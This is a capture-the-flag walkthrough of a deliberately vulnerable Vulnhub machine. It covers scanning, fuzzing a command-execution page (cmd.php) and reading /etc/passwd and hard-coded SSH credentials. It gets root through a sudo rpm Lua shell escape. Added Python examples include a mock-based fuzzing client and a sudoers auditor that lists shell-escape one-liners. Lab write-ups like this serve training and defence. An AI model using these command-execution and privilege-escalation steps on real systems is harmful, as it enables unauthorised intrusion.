Infosec Warrior
Author: jason huawen
Target information
Name: InfoSecWarrior CTF 2020: 01
URL: https://www.vulnhub.com/entry/infosecwarrior-ctf-2020-01,446/
Identifying the target host's IP address
- ┌──(kali㉿kali)-[~/Vulnhub/Infosec]
- └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
- Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
- 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
- _____________________________________________________________________________
- IP At MAC Address Count Len MAC Vendor / Hostname
- -----------------------------------------------------------------------------
- 192.168.56.1 0a:00:27:00:00:05 1 60 Unknown vendor
- 192.168.56.100 08:00:27:9f:b1:40 1 60 PCS Systemtechnik GmbH
- 192.168.56.253 08:00:27:e6:d8:5f 1 60 PCS Systemtechnik GmbH
Kali's netdiscover identifies the target as 192.168.56.253: of the three hosts on the host-only network, 192.168.56.1 is the Kali side of the adapter and 192.168.56.100 is VirtualBox's DHCP server, leaving .253 as the VM.
NMAP scan
- ┌──(kali㉿kali)-[~/Vulnhub/Infosec]
- └─$ sudo nmap -sS -sV -sC -p- 192.168.56.253 -oN nmap_full_scan
- Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-17 00:37 EDT
- Nmap scan report for bogon (192.168.56.253)
- Host is up (0.00040s latency).
- Not shown: 65351 filtered tcp ports (no-response), 182 filtered tcp ports (host-prohibited)
- PORT STATE SERVICE VERSION
- 22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
- | ssh-hostkey:
- | 1024 2fb3a5cde51433a1823bdd5a5ed75936 (DSA)
- |_ 2048 2db4152836d8b54e18818eaf3ee4dec1 (RSA)
- 80/tcp open http Apache httpd 2.2.15 ((CentOS))
- |_http-title: Apache HTTP Server Test Page powered by CentOS
- |_http-server-header: Apache/2.2.15 (CentOS)
- | http-methods:
- |_ Potentially risky methods: TRACE
- MAC Address: 08:00:27:E6:D8:5F (Oracle VirtualBox virtual NIC)
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 186.97 seconds
The NMAP scan shows two open TCP ports: 22 (OpenSSH 5.3) and 80 (Apache 2.2.15 on CentOS, serving only the default test page). Two details matter later: the ports reported as filtered (host-prohibited) are being rejected with ICMP host-prohibited by a local iptables rule, so the box has a host firewall, and the SSH server is old enough that its host-key signature algorithms (ssh-dss, SHA-1 ssh-rsa) are disabled by default in current OpenSSH clients.
Getting a shell
- ┌──(kali㉿kali)-[~/Vulnhub/Infosec]
- └─$ curl http://192.168.56.253/robots.txt
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>404 Not Found</title>
- </head><body>
- <h1>Not Found</h1>
- <p>The requested URL /robots.txt was not found on this server.</p>
- <hr>
- <address>Apache/2.2.15 (CentOS) Server at 192.168.56.253 Port 80</address>
- </body></html>
- ┌──(kali㉿kali)-[~/Vulnhub/Infosec]
- └─$ nikto -h http://192.168.56.253
- - Nikto v2.1.6
- ---------------------------------------------------------------------------
- + Target IP: 192.168.56.253
- + Target Hostname: 192.168.56.253
- + Target Port: 80
- + Start Time: 2023-04-17 00:42:27 (GMT-4)
- ---------------------------------------------------------------------------
- + Server: Apache/2.2.15 (CentOS)
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
- + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
- + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
- + Server may leak inodes via ETags, header found with file /sitemap.xml, inode: 264859, size: 292, mtime: Thu Feb 13 06:51:21 2020
- + OSVDB-3092: /sitemap.xml: This gives a nice listing of the site content.
- + OSVDB-3268: /icons/: Directory indexing found.
- + OSVDB-3233: /icons/README: Apache default file found.
- + 8724 requests: 0 error(s) and 10 item(s) reported on remote host
- + End Time: 2023-04-17 00:42:45 (GMT-4) (18 seconds)
- --------------------------------------------------------------------------
Next, can any directories or files be brute-forced? The directory scan output is not reproduced here; the files examined next are note.txt, cmd.php and the wordpress/ directory.
- ┌──(kali㉿kali)-[~/Vulnhub/Infosec]
- └─$ curl http://192.168.56.253/note.txt
- Note Form Developer Team
- 1. Try Harder
- 2. Enumeration is the key
- Ping Us on @armourinfosec @MAALP1225 @CyberKnight00
note.txt only hints that enumeration is the key. Requesting cmd.php simply redirects to an external website, and the wordpress/ directory is a dead end too, its front page reporting nothing but a database error:
- ┌──(kali㉿kali)-[~/Vulnhub/Infosec]
- └─$ curl http://192.168.56.253/wordpress/
- <!DOCTYPE html>
- <html xmlns="http://www.w3.org/1999/xhtml">
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
- <title>Database Error</title>
- </head>
- <body>
- <h1>Error establishing a database connection</h1>
- </body>
- </html>
But cmd.php looks like a command-execution page, so fuzz its parameter name. Every wrong name produces the redirect, whose body is empty, and wfuzz's --hw 0 hides responses with zero words, so only a name the script actually handles shows up:
- ┌──(kali㉿kali)-[~/Vulnhub/Infosec]
- └─$ wfuzz -c -u 'http://192.168.56.253/cmd.php?FUZZ=id' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 0
- /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
- ********************************************************
- * Wfuzz 3.1.0 - The Web Fuzzer *
- ********************************************************
- Target: http://192.168.56.253/cmd.php?FUZZ=id
- Total requests: 220560
- =====================================================================
- ID Response Lines Word Chars Payload
- =====================================================================
- 000007399: 200 0 L 10 W 58 Ch "AI"
The fuzz recovers the parameter name AI, but a GET request with it only returns:
- ┌──(kali㉿kali)-[~/Vulnhub/Infosec]
- └─$ curl http://192.168.56.253/cmd.php?AI=id
- Now the main part what it is loooooool<br>Try other method
"Try other method" suggests intercepting the request in Burp Suite and changing the method to POST (the Burp screenshot is not reproduced here). The response then becomes:
- You Found ME : - (
- uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
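The parameter discovery and method switch above, as an added example that is not part of the original writeup: a small Python client that does what `wfuzz --hw 0` did here and then drives the POST branch of cmd.php. Because the box is not reachable from a standalone script, it runs against a local mock that reproduces only the three responses observed on the real target (GET with AI yields the "Try other method" page, any other GET redirects with an empty body, POST with AI returns the "You Found ME" banner followed by command output). The mock executes nothing: its command output and the four-entry wordlist standing in for directory-list-2.3-medium.txt are constructed.

```python
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

PARAM = "AI"                     # the parameter name the fuzz recovered on the real box
BANNER = "You Found ME : - ("    # printed by cmd.php before system($cmd) output
REDIRECT = "https://www.armourinfosec.com/category/information-gathering/"

# Constructed stand-in for what system($cmd) printed (taken from the writeup's id output).
FAKE_OUTPUT = {
    "id": "uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0",
}


class MockCmdPhp(BaseHTTPRequestHandler):
    """Local stand-in for cmd.php: same three observable responses, no execution."""

    def log_message(self, *_):           # keep the server quiet
        pass

    def _reply(self, status, body=b"", location=None):
        self.send_response(status)
        if location:
            self.send_header("Location", location)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_GET(self):
        params = urllib.parse.parse_qs(urllib.parse.urlparse(self.path).query)
        if PARAM in params:              # isset($_GET['AI']) branch
            self._reply(200, b"Now the main part what it is loooooool<br>Try other method")
        else:                            # header("Location: ...") branch: empty body
            self._reply(302, location=REDIRECT)

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        params = urllib.parse.parse_qs(self.rfile.read(length).decode())
        if PARAM in params:              # isset($_POST['AI']) branch
            out = FAKE_OUTPUT.get(params[PARAM][0], "")
            self._reply(200, f"{BANNER}\n{out}\n".encode())
        else:
            self._reply(302, location=REDIRECT)


def start_mock_server():
    """Serve the mock on a random loopback port; returns (server, URL of cmd.php)."""
    srv = HTTPServer(("127.0.0.1", 0), MockCmdPhp)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}/cmd.php"


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Never follow 3xx: the redirect itself is the signal, and following it
    would send every probe to an external site."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def fetch(url, data=None):
    """Return (status, body) for a GET (data=None) or POST without following redirects."""
    opener = urllib.request.build_opener(NoRedirect)
    try:
        with opener.open(urllib.request.Request(url, data=data), timeout=5) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:   # 3xx/4xx/5xx land here; the body is still readable
        return err.code, err.read().decode(errors="replace")


def fuzz_param_names(base, wordlist, probe="id"):
    """Equivalent of `wfuzz -u base?FUZZ=id --hw 0`: try each candidate as a GET
    parameter name and keep those whose response has a non-zero word count."""
    hits = []
    for name in wordlist:
        status, body = fetch(f"{base}?{urllib.parse.urlencode({name: probe})}")
        words = len(body.split())
        if words != 0:                   # --hw 0 hides the empty-bodied redirects
            hits.append((name, status, words))
    return hits


def run_command(base, cmd):
    """Use the POST branch of cmd.php and return only the command's output."""
    status, body = fetch(base, data=urllib.parse.urlencode({PARAM: cmd}).encode())
    if status != 200 or not body.startswith(BANNER):
        raise RuntimeError(f"unexpected reply {status}: {body[:60]!r}")
    return body[len(BANNER):].strip()


if __name__ == "__main__":
    server, url = start_mock_server()
    wordlist = ["cmd", "exec", "c", "AI"]      # constructed; use a real wordlist against a target
    print(fuzz_param_names(url, wordlist))    # [('AI', 200, 10)]
    print(run_command(url, "id"))
    server.shutdown()
```

Against the real box, point `base` at http://192.168.56.253/cmd.php and feed `fuzz_param_names` the wfuzz wordlist; the 10-word hit matches the "10 W" column wfuzz reported, and `run_command` is the same POST Burp was used to send.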
Next, try to turn this into a proper shell. Note the SELinux context in the output: the web server runs in the httpd_t domain, and with the default httpd_can_network_connect boolean off, an enforcing SELinux policy blocks outbound connections from that domain, which is a likely reason reverse-shell attempts from here fail.
I tested: the nc command is not present.
/etc/passwd can be read; besides root it lists three interactive accounts, isw0, isw1 and isw2:
- root:x:0:0:root:/root:/bin/bash
- bin:x:1:1:bin:/bin:/sbin/nologin
- daemon:x:2:2:daemon:/sbin:/sbin/nologin
- adm:x:3:4:adm:/var/adm:/sbin/nologin
- lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
- sync:x:5:0:sync:/sbin:/bin/sync
- shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
- halt:x:7:0:halt:/sbin:/sbin/halt
- mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
- uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
- operator:x:11:0:operator:/root:/sbin/nologin
- games:x:12:100:games:/usr/games:/sbin/nologin
- gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
- ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
- nobody:x:99:99:Nobody:/:/sbin/nologin
- vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
- saslauth:x:499:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
- postfix:x:89:89::/var/spool/postfix:/sbin/nologin
- sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
- apache:x:48:48:Apache:/var/www:/sbin/nologin
- isw0:x:500:500::/home/isw0:/bin/bash
- isw1:x:501:501::/home/isw1:/home/isw1/bash
- isw2:x:502:502::/home/isw2:/bin/bash
- dbus:x:81:81:System message bus:/:/sbin/nologin
- avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
Running ls -alh /var/www/html gives the listing below. The index file is misnamed index.htnl, which is why Apache serves its CentOS test page instead, and the only directory writable by the apache user is wordpress/:
- total 424K
- drwxr-xr-x. 3 root root 4.0K Feb 17 2020 .
- drwxr-xr-x. 6 root root 4.0K Feb 12 2020 ..
- -rw-r--r--. 1 root root 440 Feb 17 2020 cmd.php
- -rw-r--r--. 1 root root 303K Feb 13 2020 hacker.gif
- -rw-r--r--. 1 root root 366 Feb 13 2020 index.htnl
- -rw-r--r--. 1 root root 92K Feb 13 2020 minnions.gif
- -rw-r--r--. 1 root root 120 Feb 17 2020 note.txt
- -rw-r--r--. 1 root root 292 Feb 13 2020 sitemap.xml
- drwxr-xr-x. 5 apache apache 4.0K Feb 13 2020 wordpress
Running cat cmd.php gives the file content. The top of the file is missing from the captured output; what survives shows that a GET with AI only prints "Try other method", a POST with AI is passed straight to system(), and anything else is redirected:
- ";
- echo "Try other method";
- die;
- }
- if(isset($_POST['AI'])){
- echo "You Found ME : - (";
- echo "
- ";
- $cmd = ($_POST['AI']);
- system($cmd);
- echo "
- ";
- die;
- }
- else {
- header("Location: https://www.armourinfosec.com/category/information-gathering/");
- }
- $user="isw0";
- $pass="123456789blabla";
- ?>
The file also contains a username and password. In fact, I tried all sorts of reverse-shell commands and none of them worked, so information gathering is what matters. The target's OpenSSH 5.3 can only sign with ssh-dss or SHA-1 ssh-rsa, both disabled by default in current clients, hence the -oHostKeyAlgorithms=+ssh-dss option:
- ┌──(kali㉿kali)-[~/Vulnhub/Infosec]
- └─$ ssh isw0@192.168.56.253 -oHostKeyAlgorithms=+ssh-dss
- The authenticity of host '192.168.56.253 (192.168.56.253)' can't be established.
- DSA key fingerprint is SHA256:k7Z+v1xXZDVvuiUjQxQJ89yKvN0yffDJnR5yQvPnoS8.
- This host key is known by the following other names/addresses:
- ~/.ssh/known_hosts:53: [hashed name]
- Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
- Warning: Permanently added '192.168.56.253' (DSA) to the list of known hosts.
- isw0@192.168.56.253's password:
- Last login: Mon Feb 17 13:56:07 2020 from 192.168.56.1
- [isw0@InfosecWarrior ~]$ id
- uid=500(isw0) gid=500(isw0) groups=500(isw0) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
- [isw0@InfosecWarrior ~]$
The user flag:
- [isw0@InfosecWarrior ~]$ cat isw0_user
- e4408105ca9c2a5c2714a818c475d06e
Privilege escalation
The writeup does not show the sudo -l output, but the command below only works because isw0 is allowed to run /bin/rpm as root. rpm's macro engine embeds a Lua interpreter, so --eval with a %{lua:...} macro runs arbitrary Lua, including os.execute, as the user rpm is running as:
- [isw0@InfosecWarrior wordpress]$ sudo /bin/rpm --eval '%{lua:os.execute("/bin/sh")}'
- [sudo] password for isw0:
- sh-4.1# cd /root
- sh-4.1# ls -alh
- total 56K
- dr-xr-x---. 2 root root 4.0K Feb 14 2020 .
- dr-xr-xr-x. 21 root root 4.0K Apr 17 10:05 ..
- -rw-------. 1 root root 1.1K Feb 12 2020 anaconda-ks.cfg
- -rwx------. 1 root root 65 Feb 14 2020 Armour.sh
- lrwxrwxrwx. 1 root root 9 Feb 12 2020 .bash_history -> /dev/null
- -rw-r--r--. 1 root root 18 May 20 2009 .bash_logout
- -rw-r--r--. 1 root root 176 May 20 2009 .bash_profile
- -rw-r--r--. 1 root root 176 Sep 23 2004 .bashrc
- -rw-r--r--. 1 root root 100 Sep 23 2004 .cshrc
- ----------. 1 root root 33 Feb 13 2020 flag.txt
- -rw-r--r--. 1 root root 8.3K Feb 12 2020 install.log
- -rw-r--r--. 1 root root 3.4K Feb 12 2020 install.log.syslog
- -rw-r--r--. 1 root root 129 Dec 4 2004 .tcshrc
- sh-4.1# cat flag.txt
- fc9c6eb6265921315e7c70aebd22af7e
- sh-4.1#
That completes the privilege escalation. flag.txt is mode 000, which only stops unprivileged users, and root's .bash_history is a symlink to /dev/null, so the root shell leaves no command history behind.
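The sudo rule behind this escalation, as an added example that is not part of the writeup: a Python audit that parses a sudoers file, expands Cmnd_Alias and User_Alias entries, and flags rules granting ALL or a binary with a known shell escape, rpm's Lua macro among them. The sample sudoers text is constructed (the post never shows sudo -l or the real file) and the escape list is illustrative, not exhaustive.

```python
import re

# Binaries whose sudo rule is equivalent to a root shell. rpm is the one used on
# this box (its macro engine embeds Lua); the others are equally well-known cases.
# Illustrative list, extend it for your own environment.
SHELL_ESCAPES = {
    "/bin/rpm": "rpm --eval '%{lua:os.execute(\"/bin/sh\")}'",
    "/usr/bin/rpm": "rpm --eval '%{lua:os.execute(\"/bin/sh\")}'",
    "/usr/bin/vim": "vim -c ':!/bin/sh'",
    "/bin/vi": "vi -c ':!/bin/sh'",
    "/usr/bin/find": "find . -exec /bin/sh \\; -quit",
    "/usr/bin/less": "less <file> then !/bin/sh",
    "/usr/bin/python": "python -c 'import os; os.system(\"/bin/sh\")'",
}

# Constructed sample; the box's real /etc/sudoers is not shown in the writeup.
SAMPLE_SUDOERS = """\
# constructed sample, not the machine's real /etc/sudoers
Defaults    requiretty
Cmnd_Alias  PKG = /bin/rpm, /usr/bin/yum
User_Alias  WEBOPS = isw2
root    ALL=(ALL)       ALL
isw0    ALL=(root)      PKG
WEBOPS  ALL=(root)      NOPASSWD: /sbin/service httpd restart
"""

_ALIAS = re.compile(r"^(Cmnd_Alias|User_Alias)\s+(\w+)\s*=\s*(.*)$")
_SPEC = re.compile(r"^(\S+)\s+(\S+)\s*=\s*(?:\(([^)]*)\)\s*)?(.*)$")


def parse_sudoers(text):
    """Expand aliases and return (user, host, runas, command, nopasswd) tuples.
    Common syntax only: no #include/@include, no Host_Alias/Runas_Alias, no negation."""
    cmnd_aliases, user_aliases, rules = {}, {}, []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # strip comments
        if not line or line.startswith("Defaults"):
            continue
        m = _ALIAS.match(line)
        if m:
            kind, name, members = m.groups()
            table = cmnd_aliases if kind == "Cmnd_Alias" else user_aliases
            table[name] = [x.strip() for x in members.split(",")]
            continue
        m = _SPEC.match(line)
        if not m:
            continue
        user, host, runas, cmds = m.groups()
        runas = runas or "root"                  # sudoers default when no (runas) is given
        nopasswd = False
        for cmd in cmds.split(","):
            cmd = cmd.strip()
            while cmd.upper().startswith(("NOPASSWD:", "PASSWD:")):
                tag, cmd = cmd.split(":", 1)     # a tag sticks for the rest of the list
                nopasswd = tag.strip().upper() == "NOPASSWD"
                cmd = cmd.strip()
            for u in user_aliases.get(user, [user]):
                for c in cmnd_aliases.get(cmd, [cmd]):
                    rules.append((u, host, runas, c, nopasswd))
    return rules


def audit_sudoers(text):
    """Return (user, runas, command, nopasswd, how_to_escape) for every risky rule."""
    findings = []
    for user, _host, runas, cmd, nopasswd in parse_sudoers(text):
        binary = cmd.split()[0] if cmd else ""
        if cmd == "ALL":
            findings.append((user, runas, cmd, nopasswd, "any command, no escape needed"))
        elif binary in SHELL_ESCAPES:
            findings.append((user, runas, cmd, nopasswd, SHELL_ESCAPES[binary]))
    return findings


if __name__ == "__main__":
    for user, runas, cmd, nopasswd, how in audit_sudoers(SAMPLE_SUDOERS):
        tag = "NOPASSWD " if nopasswd else ""
        print(f"{user} -> ({runas}) {tag}{cmd}: {how}")
```

The isw0 rule is flagged even though it goes through an alias and still asks for a password, because any invocation of rpm is enough; the fix is not to grant rpm at all, or to grant a root-owned wrapper script with fixed arguments instead. The parser ignores include directives, so run it over each included file as well.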